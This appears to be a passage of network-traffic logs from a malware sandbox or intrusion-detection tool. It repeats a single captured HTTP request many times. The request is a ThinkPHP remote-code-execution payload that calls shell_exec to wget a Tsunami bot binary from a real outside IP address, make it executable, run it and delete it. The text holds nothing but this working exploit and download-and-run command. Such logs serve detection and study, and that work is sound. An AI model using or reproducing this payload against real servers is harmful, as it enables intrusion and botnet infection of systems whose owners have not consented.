    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
